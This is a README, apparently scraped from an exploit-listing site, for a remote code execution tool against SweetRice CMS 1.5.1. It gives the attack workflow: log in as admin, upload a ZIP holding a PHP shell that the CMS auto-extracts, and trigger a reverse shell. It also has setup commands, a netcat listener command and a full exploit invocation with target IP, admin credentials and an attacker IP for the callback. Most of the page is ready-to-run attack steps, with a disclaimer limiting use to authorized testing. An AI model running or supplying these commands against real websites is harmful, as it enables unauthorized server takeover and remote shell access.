Share
## https://sploitus.com/exploit?id=3FD67986-CF86-56DF-8234-6CCD0A5495BF
# SweetRice CMS 1.5.1 RCE Exploit
## Overview
SweetRice CMS 1.5.1 authenticated file upload vulnerability leading to remote code execution.
Requirements
bash
## Workflow
- Authenticate to CMS admin panel
- Upload malicious ZIP via media center
- CMS auto-extracts ZIP
- Find uploaded PHP shell
- Trigger reverse shell
### Setup
```bash
git clone https://github.com/weekevy/SweetRice1.5.1-Authenticated-RCE-Exploit
cd SweetRice1.5.1-Authenticated-RCE-Exploit
pip3 install -r Requirements.txt
python3 exploit.py
```
### Usage
- Open reverse shell listener
```bash
nc -lvnp 4444
```
- Run Exploit
```bash
python3 exploit.py \
--target-ip TARGET_IP \
--username admin \
--password admin123 \
--attacker-ip ATTACKER_IP \
--port 4444 \
--zip shell.php
```
# Disclaimer
This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes ONLY. The author assumes NO LIABILITY for any misuse of this software.